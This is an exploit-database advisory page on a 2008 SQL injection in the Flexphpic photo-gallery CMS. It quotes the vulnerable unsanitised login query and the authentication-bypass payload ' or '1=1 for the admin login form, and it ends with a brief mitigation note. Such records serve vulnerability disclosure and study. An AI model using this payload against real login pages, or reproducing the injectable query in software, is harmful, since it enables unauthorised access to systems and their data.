header-logo
Suggest Exploit
vendor:
Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
by:
S.W.A.T.
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
Affected Version From: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
Affected Version To: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
Patch Exists: NO
Related CWE: N/A
CPE: a:flexphpic:flexphpic:0.0.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Flexphpic 0.0.4 & Flexphpic Pro 0.0.3 – ‘ or ‘1=1 SQL Injection Vulnerability

A vulnerability exists in Flexphpic 0.0.4 & Flexphpic Pro 0.0.3 due to improper sanitization of user-supplied input in the 'username' and 'password' parameters of the 'usercheck.php' script. An attacker can exploit this vulnerability to inject arbitrary SQL code into the application, allowing them to bypass authentication and gain access to the application.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in SQL queries.
Source

Exploit-DB raw data:

#############################################
Autore: S.W.A.T.
Email: svvateam@yahoo.com
Site: Www.BaTLaGH.coM
Cms: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
Download: http://www.china-on-site.com/flexphpic/downloads.php
##############################################
Bug In \admin\usercheck.php
$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";
Exploit:
 
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1
 
I'll Be   A C I D A L !!!

# milw0rm.com [2008-12-30]

Navigation

Suggest Exploit

Services By CQR